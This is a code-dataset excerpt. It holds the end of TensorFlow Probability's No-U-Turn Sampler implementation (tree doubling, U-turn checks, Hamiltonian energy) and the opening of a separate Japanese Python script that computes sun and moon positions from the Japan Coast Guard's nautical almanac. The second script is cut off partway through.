'.one_step'):\n state_structure = current_state\n current_state = tf.nest.flatten(current_state)\n if (tf.nest.is_nested(state_structure)\n and (not mcmc_util.is_list_like(state_structure)\n or len(current_state) != len(state_structure))):\n # TODO(b/170865194): Support dictionaries and other non-list-like state.\n raise TypeError('NUTS does not currently support nested or '\n 'non-list-like state structures (saw: {}).'.format(\n state_structure))\n\n current_target_log_prob = previous_kernel_results.target_log_prob\n [\n init_momentum,\n init_energy,\n log_slice_sample\n ] = self._start_trajectory_batched(current_state, current_target_log_prob,\n seed=start_trajectory_seed)\n\n def _copy(v):\n return v * ps.ones(\n ps.pad(\n [2], paddings=[[0, ps.rank(v)]], constant_values=1),\n dtype=v.dtype)\n\n initial_state = TreeDoublingState(\n momentum=init_momentum,\n state=current_state,\n target=current_target_log_prob,\n target_grad_parts=previous_kernel_results.grads_target_log_prob)\n initial_step_state = tf.nest.map_structure(_copy, initial_state)\n\n if MULTINOMIAL_SAMPLE:\n init_weight = tf.zeros_like(init_energy) # log(exp(H0 - H0))\n else:\n init_weight = tf.ones_like(init_energy, dtype=TREE_COUNT_DTYPE)\n\n candidate_state = TreeDoublingStateCandidate(\n state=current_state,\n target=current_target_log_prob,\n target_grad_parts=previous_kernel_results.grads_target_log_prob,\n energy=init_energy,\n weight=init_weight)\n\n initial_step_metastate = TreeDoublingMetaState(\n candidate_state=candidate_state,\n is_accepted=tf.zeros_like(init_energy, dtype=tf.bool),\n momentum_sum=init_momentum,\n energy_diff_sum=tf.zeros_like(init_energy),\n leapfrog_count=tf.zeros_like(init_energy, 
dtype=TREE_COUNT_DTYPE),\n continue_tree=tf.ones_like(init_energy, dtype=tf.bool),\n not_divergence=tf.ones_like(init_energy, dtype=tf.bool))\n\n # Convert the write/read instruction into TensorArray so that it is\n # compatible with XLA.\n write_instruction = tf.TensorArray(\n TREE_COUNT_DTYPE,\n size=len(self._write_instruction),\n clear_after_read=False).unstack(self._write_instruction)\n read_instruction = tf.TensorArray(\n tf.int32,\n size=len(self._read_instruction),\n clear_after_read=False).unstack(self._read_instruction)\n\n current_step_meta_info = OneStepMetaInfo(\n log_slice_sample=log_slice_sample,\n init_energy=init_energy,\n write_instruction=write_instruction,\n read_instruction=read_instruction\n )\n\n momentum_state_memory = MomentumStateSwap(\n momentum_swap=self.init_momentum_state_memory(init_momentum),\n state_swap=self.init_momentum_state_memory(current_state))\n\n step_size = _prepare_step_size(\n previous_kernel_results.step_size,\n current_target_log_prob.dtype,\n len(current_state))\n _, _, _, new_step_metastate = tf.while_loop(\n cond=lambda iter_, seed, state, metastate: ( # pylint: disable=g-long-lambda\n (iter_ < self.max_tree_depth) &\n tf.reduce_any(metastate.continue_tree)),\n body=lambda iter_, seed, state, metastate: self._loop_tree_doubling( # pylint: disable=g-long-lambda\n step_size,\n momentum_state_memory,\n current_step_meta_info,\n iter_,\n state,\n metastate,\n seed),\n loop_vars=(\n tf.zeros([], dtype=tf.int32, name='iter'),\n loop_seed,\n initial_step_state,\n initial_step_metastate),\n parallel_iterations=self.parallel_iterations,\n )\n\n kernel_results = NUTSKernelResults(\n target_log_prob=new_step_metastate.candidate_state.target,\n grads_target_log_prob=(\n new_step_metastate.candidate_state.target_grad_parts),\n step_size=previous_kernel_results.step_size,\n log_accept_ratio=tf.math.log(\n new_step_metastate.energy_diff_sum /\n tf.cast(new_step_metastate.leapfrog_count,\n dtype=new_step_metastate.energy_diff_sum.dtype)),\n leapfrogs_taken=(\n new_step_metastate.leapfrog_count * self.unrolled_leapfrog_steps\n ),\n is_accepted=new_step_metastate.is_accepted,\n reach_max_depth=new_step_metastate.continue_tree,\n has_divergence=~new_step_metastate.not_divergence,\n energy=new_step_metastate.candidate_state.energy,\n seed=seed,\n )\n\n result_state = tf.nest.pack_sequence_as(\n state_structure, new_step_metastate.candidate_state.state)\n return result_state, kernel_results\n\n def init_momentum_state_memory(self, input_tensors):\n \"\"\"Allocate TensorArray for storing state and momentum.\"\"\"\n shape_and_dtype = [(ps.shape(x_), x_.dtype) for x_ in input_tensors]\n return [ # pylint: disable=g-complex-comprehension\n ps.zeros(\n ps.concat([[max(self._write_instruction) + 1], s], axis=0),\n dtype=d) for (s, d) in shape_and_dtype\n ]\n\n def bootstrap_results(self, init_state):\n \"\"\"Creates initial `previous_kernel_results` using a supplied `state`.\"\"\"\n with tf.name_scope(self.name + '.bootstrap_results'):\n if not tf.nest.is_nested(init_state):\n init_state = [init_state]\n dummy_momentum = [tf.ones_like(state) for state in init_state]\n\n [\n _,\n _,\n current_target_log_prob,\n current_grads_log_prob,\n ] = leapfrog_impl.process_args(self.target_log_prob_fn, dummy_momentum,\n init_state)\n\n # Confirm that the step size is compatible with the state parts.\n _ = _prepare_step_size(\n self.step_size, current_target_log_prob.dtype, len(init_state))\n\n return NUTSKernelResults(\n target_log_prob=current_target_log_prob,\n 
grads_target_log_prob=current_grads_log_prob,\n step_size=tf.nest.map_structure(\n lambda x: tf.convert_to_tensor( # pylint: disable=g-long-lambda\n x,\n dtype=current_target_log_prob.dtype,\n name='step_size'),\n self.step_size),\n log_accept_ratio=tf.zeros_like(current_target_log_prob,\n name='log_accept_ratio'),\n leapfrogs_taken=tf.zeros_like(current_target_log_prob,\n dtype=TREE_COUNT_DTYPE,\n name='leapfrogs_taken'),\n is_accepted=tf.zeros_like(current_target_log_prob,\n dtype=tf.bool,\n name='is_accepted'),\n reach_max_depth=tf.zeros_like(current_target_log_prob,\n dtype=tf.bool,\n name='reach_max_depth'),\n has_divergence=tf.zeros_like(current_target_log_prob,\n dtype=tf.bool,\n name='has_divergence'),\n energy=compute_hamiltonian(\n current_target_log_prob, dummy_momentum,\n shard_axis_names=self.experimental_shard_axis_names),\n # Allow room for one_step's seed.\n seed=samplers.zeros_seed(),\n )\n\n @property\n def experimental_shard_axis_names(self):\n return self._parameters['experimental_shard_axis_names']\n\n def experimental_with_shard_axes(self, shard_axis_names):\n return self.copy(experimental_shard_axis_names=shard_axis_names)\n\n def _start_trajectory_batched(self, state, target_log_prob, seed):\n \"\"\"Computations needed to start a trajectory.\"\"\"\n with tf.name_scope('start_trajectory_batched'):\n seeds = list(samplers.split_seed(seed, n=len(state) + 1))\n momentum_seeds = distribute_lib.fold_in_axis_index(\n seeds[:-1], self.experimental_shard_axis_names)\n momentum = [\n samplers.normal( # pylint: disable=g-complex-comprehension\n shape=ps.shape(x),\n dtype=x.dtype,\n seed=momentum_seeds[i]) for (i, x) in enumerate(state)\n ]\n init_energy = compute_hamiltonian(\n target_log_prob, momentum,\n shard_axis_names=self.experimental_shard_axis_names)\n\n if MULTINOMIAL_SAMPLE:\n return momentum, init_energy, None\n\n # Draw a slice variable u ~ Uniform(0, p(initial state, initial\n # momentum)) and compute log u. For numerical stability, we perform this\n # in log space where log u = log (u' * p(...)) = log u' + log\n # p(...) 
and u' ~ Uniform(0, 1).\n log_slice_sample = tf.math.log1p(-samplers.uniform(\n shape=ps.shape(init_energy),\n dtype=init_energy.dtype,\n seed=seeds[len(state)]))\n return momentum, init_energy, log_slice_sample\n\n def _loop_tree_doubling(self, step_size, momentum_state_memory,\n current_step_meta_info, iter_, initial_step_state,\n initial_step_metastate, seed):\n \"\"\"Main loop for tree doubling.\"\"\"\n with tf.name_scope('loop_tree_doubling'):\n (direction_seed,\n subtree_seed,\n acceptance_seed,\n next_seed) = samplers.split_seed(seed, n=4)\n batch_shape = ps.shape(current_step_meta_info.init_energy)\n direction = tf.cast(\n samplers.uniform(\n shape=batch_shape,\n minval=0,\n maxval=2,\n dtype=tf.int32,\n seed=direction_seed),\n dtype=tf.bool)\n\n tree_start_states = tf.nest.map_structure(\n lambda v: bu.where_left_justified_mask(direction, v[1], v[0]),\n initial_step_state)\n\n directions_expanded = [\n bu.left_justified_expand_dims_like(direction, state)\n for state in tree_start_states.state\n ]\n\n integrator = leapfrog_impl.SimpleLeapfrogIntegrator(\n self.target_log_prob_fn,\n step_sizes=[\n tf.where(d, ss, -ss)\n for d, ss in zip(directions_expanded, step_size)\n ],\n num_steps=self.unrolled_leapfrog_steps)\n\n [\n candidate_tree_state,\n tree_final_states,\n final_not_divergence,\n continue_tree_final,\n energy_diff_tree_sum,\n momentum_subtree_cumsum,\n leapfrogs_taken\n ] = self._build_sub_tree(\n directions_expanded,\n integrator,\n current_step_meta_info,\n # num_steps_at_this_depth = 2**iter_ = 1 << iter_\n tf.bitwise.left_shift(1, iter_),\n tree_start_states,\n initial_step_metastate.continue_tree,\n initial_step_metastate.not_divergence,\n momentum_state_memory,\n seed=subtree_seed)\n\n last_candidate_state = initial_step_metastate.candidate_state\n\n energy_diff_sum = (\n energy_diff_tree_sum + initial_step_metastate.energy_diff_sum)\n if MULTINOMIAL_SAMPLE:\n tree_weight = tf.where(\n continue_tree_final,\n candidate_tree_state.weight,\n tf.constant(-np.inf, dtype=candidate_tree_state.weight.dtype))\n weight_sum = generic.log_add_exp(\n tree_weight, last_candidate_state.weight)\n log_accept_thresh = tree_weight - last_candidate_state.weight\n else:\n tree_weight = tf.where(\n continue_tree_final,\n candidate_tree_state.weight,\n tf.zeros([], dtype=TREE_COUNT_DTYPE))\n weight_sum = tree_weight + last_candidate_state.weight\n log_accept_thresh = tf.math.log(\n tf.cast(tree_weight, tf.float32) /\n tf.cast(last_candidate_state.weight, tf.float32))\n log_accept_thresh = tf.where(\n tf.math.is_nan(log_accept_thresh),\n tf.zeros([], log_accept_thresh.dtype),\n log_accept_thresh)\n u = tf.math.log1p(-samplers.uniform(\n shape=batch_shape,\n dtype=log_accept_thresh.dtype,\n seed=acceptance_seed))\n is_sample_accepted = u <= log_accept_thresh\n\n choose_new_state = is_sample_accepted & continue_tree_final\n\n new_candidate_state = TreeDoublingStateCandidate(\n state=[\n bu.where_left_justified_mask(choose_new_state, s0, s1)\n for s0, s1 in zip(candidate_tree_state.state,\n last_candidate_state.state)\n ],\n target=bu.where_left_justified_mask(\n choose_new_state,\n candidate_tree_state.target,\n last_candidate_state.target),\n target_grad_parts=[\n bu.where_left_justified_mask(choose_new_state, grad0, grad1)\n for grad0, grad1 in zip(candidate_tree_state.target_grad_parts,\n last_candidate_state.target_grad_parts)\n ],\n energy=bu.where_left_justified_mask(\n choose_new_state,\n candidate_tree_state.energy,\n last_candidate_state.energy),\n weight=weight_sum)\n\n for 
new_candidate_state_temp, old_candidate_state_temp in zip(\n new_candidate_state.state, last_candidate_state.state):\n tensorshape_util.set_shape(new_candidate_state_temp,\n old_candidate_state_temp.shape)\n\n for new_candidate_grad_temp, old_candidate_grad_temp in zip(\n new_candidate_state.target_grad_parts,\n last_candidate_state.target_grad_parts):\n tensorshape_util.set_shape(new_candidate_grad_temp,\n old_candidate_grad_temp.shape)\n\n # Update left right information of the trajectory, and check trajectory\n # level U turn\n tree_otherend_states = tf.nest.map_structure(\n lambda v: bu.where_left_justified_mask(direction, v[0], v[1]),\n initial_step_state)\n\n new_step_state = tf.nest.pack_sequence_as(initial_step_state, [\n tf.stack([ # pylint: disable=g-complex-comprehension\n bu.where_left_justified_mask(direction, right, left),\n bu.where_left_justified_mask(direction, left, right),\n ], axis=0)\n for left, right in zip(tf.nest.flatten(tree_final_states),\n tf.nest.flatten(tree_otherend_states))\n ])\n\n momentum_tree_cumsum = []\n for p0, p1 in zip(\n initial_step_metastate.momentum_sum, momentum_subtree_cumsum):\n momentum_part_temp = p0 + p1\n tensorshape_util.set_shape(momentum_part_temp, p0.shape)\n momentum_tree_cumsum.append(momentum_part_temp)\n\n for new_state_temp, old_state_temp in zip(\n tf.nest.flatten(new_step_state),\n tf.nest.flatten(initial_step_state)):\n tensorshape_util.set_shape(new_state_temp, old_state_temp.shape)\n\n if GENERALIZED_UTURN:\n state_diff = momentum_tree_cumsum\n else:\n state_diff = [s[1] - s[0] for s in new_step_state.state]\n\n no_u_turns_trajectory = has_not_u_turn(\n state_diff,\n [m[0] for m in new_step_state.momentum],\n [m[1] for m in new_step_state.momentum],\n log_prob_rank=ps.rank_from_shape(batch_shape),\n shard_axis_names=self.experimental_shard_axis_names)\n\n new_step_metastate = TreeDoublingMetaState(\n candidate_state=new_candidate_state,\n is_accepted=choose_new_state | initial_step_metastate.is_accepted,\n momentum_sum=momentum_tree_cumsum,\n energy_diff_sum=energy_diff_sum,\n continue_tree=continue_tree_final & no_u_turns_trajectory,\n not_divergence=final_not_divergence,\n leapfrog_count=(initial_step_metastate.leapfrog_count +\n leapfrogs_taken))\n\n return iter_ + 1, next_seed, new_step_state, new_step_metastate\n\n def _build_sub_tree(self,\n directions,\n integrator,\n current_step_meta_info,\n nsteps,\n initial_state,\n continue_tree,\n not_divergence,\n momentum_state_memory,\n seed,\n name=None):\n with tf.name_scope('build_sub_tree'):\n batch_shape = ps.shape(current_step_meta_info.init_energy)\n # We never want to select the initial state\n if MULTINOMIAL_SAMPLE:\n init_weight = tf.fill(\n batch_shape,\n tf.constant(-np.inf,\n dtype=current_step_meta_info.init_energy.dtype))\n else:\n init_weight = tf.zeros(batch_shape, dtype=TREE_COUNT_DTYPE)\n\n init_momentum_cumsum = [tf.zeros_like(x) for x in initial_state.momentum]\n initial_state_candidate = TreeDoublingStateCandidate(\n state=initial_state.state,\n target=initial_state.target,\n target_grad_parts=initial_state.target_grad_parts,\n energy=initial_state.target,\n weight=init_weight)\n energy_diff_sum = tf.zeros_like(current_step_meta_info.init_energy,\n name='energy_diff_sum')\n [\n _,\n _,\n energy_diff_tree_sum,\n momentum_tree_cumsum,\n leapfrogs_taken,\n final_state,\n candidate_tree_state,\n final_continue_tree,\n final_not_divergence,\n momentum_state_memory,\n ] = tf.while_loop(\n cond=lambda iter_, seed, energy_diff_sum, init_momentum_cumsum, # pylint: 
disable=g-long-lambda\n leapfrogs_taken, state, state_c, continue_tree,\n not_divergence, momentum_state_memory: (\n (iter_ < nsteps) & tf.reduce_any(continue_tree)),\n body=lambda iter_, seed, energy_diff_sum, init_momentum_cumsum, # pylint: disable=g-long-lambda\n leapfrogs_taken, state, state_c, continue_tree,\n not_divergence, momentum_state_memory: (\n self._loop_build_sub_tree(\n directions, integrator, current_step_meta_info,\n iter_, energy_diff_sum, init_momentum_cumsum,\n leapfrogs_taken, state, state_c, continue_tree,\n not_divergence, momentum_state_memory, seed)),\n loop_vars=(\n tf.zeros([], dtype=tf.int32, name='iter'),\n seed,\n energy_diff_sum,\n init_momentum_cumsum,\n tf.zeros(batch_shape, dtype=TREE_COUNT_DTYPE),\n initial_state,\n initial_state_candidate,\n continue_tree,\n not_divergence,\n momentum_state_memory,\n ),\n parallel_iterations=self.parallel_iterations\n )\n\n return (\n candidate_tree_state,\n final_state,\n final_not_divergence,\n final_continue_tree,\n energy_diff_tree_sum,\n momentum_tree_cumsum,\n leapfrogs_taken,\n )\n\n def _loop_build_sub_tree(self,\n directions,\n integrator,\n current_step_meta_info,\n iter_,\n energy_diff_sum_previous,\n momentum_cumsum_previous,\n leapfrogs_taken,\n prev_tree_state,\n candidate_tree_state,\n continue_tree_previous,\n not_divergent_previous,\n momentum_state_memory,\n seed):\n \"\"\"Base case in tree doubling.\"\"\"\n acceptance_seed, next_seed = samplers.split_seed(seed)\n with tf.name_scope('loop_build_sub_tree'):\n # Take one leapfrog step in the direction v and check divergence\n [\n next_momentum_parts,\n next_state_parts,\n next_target,\n next_target_grad_parts\n ] = integrator(prev_tree_state.momentum,\n prev_tree_state.state,\n prev_tree_state.target,\n prev_tree_state.target_grad_parts)\n\n next_tree_state = TreeDoublingState(\n momentum=next_momentum_parts,\n state=next_state_parts,\n target=next_target,\n target_grad_parts=next_target_grad_parts)\n momentum_cumsum = [p0 + p1 for p0, p1 in zip(momentum_cumsum_previous,\n next_momentum_parts)]\n # If the tree have not yet terminated previously, we count this leapfrog.\n leapfrogs_taken = tf.where(\n continue_tree_previous, leapfrogs_taken + 1, leapfrogs_taken)\n\n write_instruction = current_step_meta_info.write_instruction\n read_instruction = current_step_meta_info.read_instruction\n init_energy = current_step_meta_info.init_energy\n\n if GENERALIZED_UTURN:\n state_to_write = momentum_cumsum_previous\n state_to_check = momentum_cumsum\n else:\n state_to_write = next_state_parts\n state_to_check = next_state_parts\n\n batch_shape = ps.shape(next_target)\n has_not_u_turn_init = ps.ones(batch_shape, dtype=tf.bool)\n\n read_index = read_instruction.gather([iter_])[0]\n no_u_turns_within_tree = has_not_u_turn_at_all_index( # pylint: disable=g-long-lambda\n read_index,\n directions,\n momentum_state_memory,\n next_momentum_parts,\n state_to_check,\n has_not_u_turn_init,\n log_prob_rank=ps.rank(next_target),\n shard_axis_names=self.experimental_shard_axis_names)\n\n # Get index to write state into memory swap\n write_index = write_instruction.gather([iter_])\n momentum_state_memory = MomentumStateSwap(\n momentum_swap=[\n _safe_tensor_scatter_nd_update(old, [write_index], [new])\n for old, new in zip(momentum_state_memory.momentum_swap,\n next_momentum_parts)\n ],\n state_swap=[\n _safe_tensor_scatter_nd_update(old, [write_index], [new])\n for old, new in zip(momentum_state_memory.state_swap,\n state_to_write)\n ])\n\n energy = compute_hamiltonian(\n 
next_target, next_momentum_parts,\n shard_axis_names=self.experimental_shard_axis_names)\n current_energy = tf.where(tf.math.is_nan(energy),\n tf.constant(-np.inf, dtype=energy.dtype),\n energy)\n energy_diff = current_energy - init_energy\n\n if MULTINOMIAL_SAMPLE:\n not_divergent = -energy_diff < self.max_energy_diff\n weight_sum = generic.log_add_exp(\n candidate_tree_state.weight, energy_diff)\n log_accept_thresh = energy_diff - weight_sum\n else:\n log_slice_sample = current_step_meta_info.log_slice_sample\n not_divergent = log_slice_sample - energy_diff < self.max_energy_diff\n # Uniform sampling on the trajectory within the subtree across valid\n # samples.\n is_valid = log_slice_sample <= energy_diff\n weight_sum = tf.where(is_valid,\n candidate_tree_state.weight + 1,\n candidate_tree_state.weight)\n log_accept_thresh = tf.where(\n is_valid,\n -tf.math.log(tf.cast(weight_sum, dtype=tf.float32)),\n tf.constant(-np.inf, dtype=tf.float32))\n u = tf.math.log1p(-samplers.uniform(\n shape=batch_shape,\n dtype=log_accept_thresh.dtype,\n seed=acceptance_seed))\n is_sample_accepted = u <= log_accept_thresh\n\n next_candidate_tree_state = TreeDoublingStateCandidate(\n state=[\n bu.where_left_justified_mask(is_sample_accepted, s0, s1)\n for s0, s1 in zip(next_state_parts, candidate_tree_state.state)\n ],\n target=bu.where_left_justified_mask(\n is_sample_accepted, next_target, candidate_tree_state.target),\n target_grad_parts=[\n bu.where_left_justified_mask(is_sample_accepted, grad0, grad1)\n for grad0, grad1 in zip(next_target_grad_parts,\n candidate_tree_state.target_grad_parts)\n ],\n energy=bu.where_left_justified_mask(\n is_sample_accepted,\n current_energy,\n candidate_tree_state.energy),\n weight=weight_sum)\n\n continue_tree = not_divergent & continue_tree_previous\n continue_tree_next = no_u_turns_within_tree & continue_tree\n\n not_divergent_tokeep = tf.where(\n continue_tree_previous,\n not_divergent,\n ps.ones(batch_shape, dtype=tf.bool))\n\n # min(1., exp(energy_diff)).\n exp_energy_diff = tf.math.exp(tf.minimum(energy_diff, 0.))\n energy_diff_sum = tf.where(continue_tree,\n energy_diff_sum_previous + exp_energy_diff,\n energy_diff_sum_previous)\n\n return (\n iter_ + 1,\n next_seed,\n energy_diff_sum,\n momentum_cumsum,\n leapfrogs_taken,\n next_tree_state,\n next_candidate_tree_state,\n continue_tree_next,\n not_divergent_previous & not_divergent_tokeep,\n momentum_state_memory,\n )\n\n\ndef has_not_u_turn_at_all_index(read_indexes, direction, momentum_state_memory,\n momentum_right, state_right,\n no_u_turns_within_tree, log_prob_rank,\n shard_axis_names=None):\n \"\"\"Check u turn for early stopping.\"\"\"\n\n def _get_left_state_and_check_u_turn(left_current_index, no_u_turns_last):\n \"\"\"Check U turn on a single index.\"\"\"\n momentum_left = [\n tf.gather(x, left_current_index, axis=0)\n for x in momentum_state_memory.momentum_swap\n ]\n state_left = [\n tf.gather(x, left_current_index, axis=0)\n for x in momentum_state_memory.state_swap\n ]\n # Note that in generalized u turn, state_diff is actually the cumulated sum\n # of the momentum.\n state_diff = [s1 - s2 for s1, s2 in zip(state_right, state_left)]\n if not GENERALIZED_UTURN:\n state_diff = [tf.where(d, m, -m) for d, m in zip(direction, state_diff)]\n\n no_u_turns_current = has_not_u_turn(\n state_diff,\n momentum_left,\n momentum_right,\n log_prob_rank,\n shard_axis_names=shard_axis_names)\n return left_current_index + 1, no_u_turns_current & no_u_turns_last\n\n _, no_u_turns_within_tree = tf.while_loop(\n 
cond=lambda i, no_u_turn: ((i < read_indexes[1]) & # pylint: disable=g-long-lambda\n tf.reduce_any(no_u_turn)),\n body=_get_left_state_and_check_u_turn,\n loop_vars=(read_indexes[0], no_u_turns_within_tree))\n return no_u_turns_within_tree\n\n\ndef has_not_u_turn(state_diff,\n momentum_left,\n momentum_right,\n log_prob_rank,\n shard_axis_names=None):\n \"\"\"If the trajectory does not exhibit a U-turn pattern.\"\"\"\n shard_axis_names = (shard_axis_names or ([None] * len(state_diff)))\n def reduce_sum(x, m, shard_axes):\n out = tf.reduce_sum(x, axis=ps.range(log_prob_rank, ps.rank(m)))\n if shard_axes is not None:\n out = distribute_lib.psum(out, shard_axes)\n return out\n with tf.name_scope('has_not_u_turn'):\n batch_dot_product_left = sum(\n reduce_sum(s_diff * m, m, axes)\n for s_diff, m, axes in zip(state_diff, momentum_left,\n shard_axis_names)\n )\n batch_dot_product_right = sum(\n reduce_sum(s_diff * m, m, axes)\n for s_diff, m, axes in zip(state_diff, momentum_right,\n shard_axis_names)\n )\n return (batch_dot_product_left >= 0) & (batch_dot_product_right >= 0)\n\n\ndef build_tree_uturn_instruction(max_depth, init_memory=0):\n \"\"\"Run build tree and output the u turn checking input instruction.\"\"\"\n\n def _buildtree(address, depth):\n if depth == 0:\n address += 1\n return address, address\n else:\n address_left, address_right = _buildtree(address, depth - 1)\n _, address_right = _buildtree(address_right, depth - 1)\n instruction.append((address_left, address_right))\n return address_left, address_right\n\n instruction = []\n _, _ = _buildtree(init_memory, max_depth)\n return np.unique(np.array(instruction, dtype=np.int32), axis=0)\n\n\ndef generate_efficient_write_read_instruction(instruction_array):\n \"\"\"Statically generate a memory efficient write/read instruction.\"\"\"\n nsteps_within_tree = np.max(instruction_array) + 1\n instruction_mat = np.zeros((nsteps_within_tree, nsteps_within_tree))\n for previous_step, current_step in instruction_array:\n instruction_mat[previous_step, current_step] = 1\n\n # Generate a sparse matrix that represents the memory footprint:\n # -1 : no need to save to memory (these are odd steps)\n # 1 : needed for check u turn (either already in memory or will be saved)\n # 0 : still in memory but not needed for check u turn\n for i in range(nsteps_within_tree):\n temp = instruction_mat[i]\n endpoint = np.where(temp == 1)[0]\n if endpoint.size > 0:\n temp[:i] = -1\n temp[endpoint[-1]+1:] = -1\n instruction_mat[i] = temp\n else:\n instruction_mat[i] = -1\n\n # In the classical U-turn check, writing happens only at odd steps and the\n # instruction follows sequence A000120 (https://oeis.org/A000120)\n to_write_temp = np.sum(instruction_mat > -1, axis=0)\n write_instruction = to_write_temp - 1\n write_instruction[np.diag(instruction_mat) == -1] = max(to_write_temp)\n\n read_instruction = []\n for i in range(nsteps_within_tree):\n temp_instruction = instruction_mat[:, i]\n if np.sum(temp_instruction == 1) > 0:\n r = np.where(temp_instruction[temp_instruction >= 0] == 1)[0][0]\n read_instruction.append([r, r + np.sum(temp_instruction == 1)])\n else:\n # If there is no instruction to do U turn check (e.g., odd step in the\n # original U turn check scheme), we append a pair of 0s as instruction.\n # In the innermost while loop of build tree, we loop through the read\n # instruction to check U turn - looping from 0 to 0 works with the\n # existing code while no computation happens.\n read_instruction.append([0, 0])\n return write_instruction, 
np.asarray(read_instruction)\n\n\ndef _prepare_step_size(step_size, dtype, n_state_parts):\n step_sizes, _ = mcmc_util.prepare_state_parts(\n step_size, dtype=dtype, name='step_size')\n if len(step_sizes) == 1:\n step_sizes *= n_state_parts\n if n_state_parts != len(step_sizes):\n raise ValueError('There should be exactly one `step_size` or it should '\n 'have same length as `current_state`.')\n return step_sizes\n\n\ndef compute_hamiltonian(target_log_prob, momentum_parts,\n shard_axis_names=None):\n \"\"\"Compute the Hamiltonian of the current system.\"\"\"\n shard_axis_names = (shard_axis_names or ([None] * len(momentum_parts)))\n independent_chain_ndims = ps.rank(target_log_prob)\n def compute_sum_sq(v, shard_axes):\n sum_sq = tf.reduce_sum(v ** 2., axis=ps.range(\n independent_chain_ndims, ps.rank(v)))\n if shard_axes is not None:\n sum_sq = distribute_lib.psum(sum_sq, shard_axes)\n return sum_sq\n momentum_sq_parts = (\n tf.cast( # pylint: disable=g-complex-comprehension\n compute_sum_sq(m, axes),\n dtype=target_log_prob.dtype)\n for m, axes in zip(momentum_parts, shard_axis_names))\n # TODO(jvdillon): Verify no broadcasting happening.\n return target_log_prob - 0.5 * sum(momentum_sq_parts)\n\n\ndef _safe_tensor_scatter_nd_update(tensor, indices, updates):\n if tensorshape_util.num_elements(tensor.shape) == 0:\n return tensor\n return tf.tensor_scatter_nd_update(tensor, indices, updates)\n","sub_path":"tensorflow_probability/python/mcmc/nuts.py","file_name":"nuts.py","file_ext":"py","file_size_in_byte":45152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
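For orientation, here is a minimal usage sketch of this kernel via the public `tfp.mcmc` API, sampling a standard normal with four parallel chains. The import paths and the `is_accepted` field follow the conventions visible in the record above; the step size and chain counts are illustrative values only, not recommendations:

```python
import tensorflow as tf
import tensorflow_probability as tfp

tfd = tfp.distributions

target = tfd.Normal(loc=0., scale=1.)

# One NUTS transition kernel; step_size trades progress against rejections.
kernel = tfp.mcmc.NoUTurnSampler(
    target_log_prob_fn=target.log_prob,
    step_size=0.3)

samples, is_accepted = tfp.mcmc.sample_chain(
    num_results=500,
    num_burnin_steps=200,
    current_state=tf.zeros([4]),              # 4 independent chains
    kernel=kernel,
    trace_fn=lambda _, pkr: pkr.is_accepted)  # a NUTSKernelResults field

print(samples.shape)  # (500, 4): 500 draws for each of the 4 chains
```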
+{"seq_id":"565084193","text":"#! /usr/local/bin/python3.6\n\"\"\"\n----------------------------------------------------\n海上保安庁の天測暦より太陽・月の視位置を計算\n(視黄経・視黄緯の計算を追加したもの)\n\n date name version\n 2018.03.30 mk-mode.com 1.00 新規作成\n\n Copyright(C) 2018 mk-mode.com All Rights Reserved.\n----------------------------------------------------\n 引数 : JST(日本標準時)\n 書式:YYYYMMDD or YYYYMMDDHHMMSS\n 無指定なら現在(システム日時)と判断。\n----------------------------------------------------\n\"\"\"\nimport datetime\nimport math\nimport re\nimport sys\nimport traceback\nimport consts as cst\n\n\nclass EphSunMoon:\n JST_UTC = 9 # JST - UTC\n MSG_ERR_1 = \"[ERROR] Format: YYYYMMDD or YYYYMMDDHHMMSS\"\n MSG_ERR_2 = \"[ERROR] It should be between 20080101090000 and 20200101085959.\"\n MSG_ERR_3 = \"[ERROR] Invalid date!\"\n DIVS = {\n \"SUN_RA\": cst.SUN_RA,\n \"SUN_DEC\": cst.SUN_DEC,\n \"SUN_DIST\": cst.SUN_DIST,\n \"MOON_RA\": cst.MOON_RA,\n \"MOON_DEC\": cst.MOON_DEC,\n \"MOON_HP\": cst.MOON_HP,\n \"R\": cst.R,\n \"EPS\": cst.EPS\n }\n DELTA_T = {\n 2008: 65, 2009: 66, 2010: 66, 2011: 67, 2012: 67, 2013: 67,\n 2014: 67, 2015: 68, 2016: 68, 2017: 68, 2018: 69, 2019:70\n }\n\n def __init__(self):\n self.vals = {} # 所要値格納用dict\n self.__get_arg() # 引数取得\n\n def exec(self):\n \"\"\" 実行 \"\"\"\n try:\n self.__calc_t() # 通日 T の計算\n self.__calc_f() # 世界時 UT(時・分・秒) の端数計算\n self.__get_delta_t() # ΔT(世界時 - 地球時)の取得\n self.__calc_tm() # 計算用時刻引数 tm の計算\n self.__calc() # 各種計算\n self.__display() # 結果出力\n except Exception as e:\n raise\n\n def __get_arg(self):\n \"\"\" 引数取得\n * コマンドライン引数を取得して日時の妥当性チェックを行う。\n * コマンドライン引数無指定なら、現在日時とする。\n * JST, UTC をインスタンス変数 jst, utc に格納する。\n \"\"\"\n try:\n if len(sys.argv) < 2:\n self.jst = datetime.datetime.now()\n else:\n arg = sys.argv[1]\n if re.search(r\"^([0-9]{8}|[0-9]{14})$\", arg) is None:\n print(self.MSG_ERR_1)\n sys.exit()\n arg = arg.ljust(14, \"0\")\n try:\n self.jst = datetime.datetime.strptime(arg, \"%Y%m%d%H%M%S\")\n except ValueError:\n print(self.MSG_ERR_3)\n sys.exit(1)\n self.utc = self.jst - datetime.timedelta(hours=self.JST_UTC)\n except Exception as e:\n raise\n\n def __calc_t(self):\n \"\"\" 通日 T の計算\n * 通日 T は1月0日を第0日とした通算日数で、次式により求める。\n T = 30 * P + Q * (S - Y) + P * (1 - Q) + 日\n 但し、\n P = 月 - 1, Q = [(月 + 7) / 10]\n Y = [(年 / 4) - [(年 / 4)] + 0.77]\n S = [P * 0.55 - 0.33]\n で、[] は整数部のみを抜き出すことを意味する。\n * 求めた通日 T はインスタンス変数 t に格納する。\n \"\"\"\n try:\n p = self.utc.month - 1\n q = (self.utc.month + 7) // 10\n y = int(self.utc.year / 4 - self.utc.year // 4 + 0.77)\n s = int(p * 0.55 - 0.33)\n self.t = 30 * p + q * (s - y) + p * (1 - q) + self.utc.day\n except Exception as e:\n raise\n\n def __calc_f(self):\n \"\"\" 世界時 UT(時・分・秒) の端数計算\n * 次式により求め、インスタンス変数 f に格納する。\n F = 時 / 24 + 分 / 1440 + 秒 / 86400\n \"\"\"\n try:\n self.f = self.utc.hour / 24 \\\n + self.utc.minute / 1440 \\\n + self.utc.second / 86400\n except Exception as e:\n raise\n\n def __get_delta_t(self):\n \"\"\" ΔT(世界時 - 地球時)の取得\n * あらかじめ予測されている 